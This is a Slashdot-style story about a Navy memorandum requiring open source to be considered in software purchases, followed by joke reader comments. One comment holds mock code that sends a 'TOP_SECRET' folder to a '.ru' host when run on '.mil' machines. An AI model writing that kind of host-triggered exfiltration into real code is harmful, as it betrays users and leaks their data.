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Navy Now Mandated To Consider FOSS As an Option

lisah writes "In a memorandum handed down from Department of the Navy CIO John Carey this week, the Navy is now mandated to consider open source solutions when making new software acquisitions. According John Weathersby, executive director of the Open Source Software Institute, this is the first in a series of documents that will also address 'development and distribution issues regarding open source within Navy IT environments.'"

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  1. Inconceivable! by theTrueMikeBrown · · Score: 5, Funny

    The government saving money?

    I am speechless.

    1. Re:Inconceivable! by MillionthMonkey · · Score: 5, Funny

      They're probably worried about terrorists having write access to open source CVS repositories. I saw this in SourceForge recently:

      if ($hostname =~ m/.*\.mil/) {
          multiPartUpload("C:\\TOP_SECRET\\", "http://post.secrets.ru?param=suckers");
          explode() || die("The requested operation cannot be performed");
      }

  2. Sing with me by niceone · · Score: 4, Funny

    In the navy
    Yes, you can sail the gcc's
    In the navy
    Yes, you can open source with ease
    In the navy
    Come on now, people, make && make install
    In the navy, in the navy
    ... hmm I've kind of painted myself into a corner there...

    1. Re:Sing with me by drinkypoo · · Score: 4, Funny

      ... hmm I've kind of painted myself into a corner there...

      I was going to say that you've painted yourself mauve, or possibly chartreuse.

      --
      "You're right," Fisheye says. "I should have set it on 'whip' or 'chop.'"
  3. Finally! by eln · · Score: 5, Funny

    Maybe now someone will finally download (or, dare I say, contribute?) to my sourceforge project. It's an Open Source nuclear submarine guidance system forked from an early beta of GAIM. Still in alpha, and right now it's got a little bit of a bug where if you try to get the sub to surface it will occasionally launch all of its missiles, but it's still pretty usable.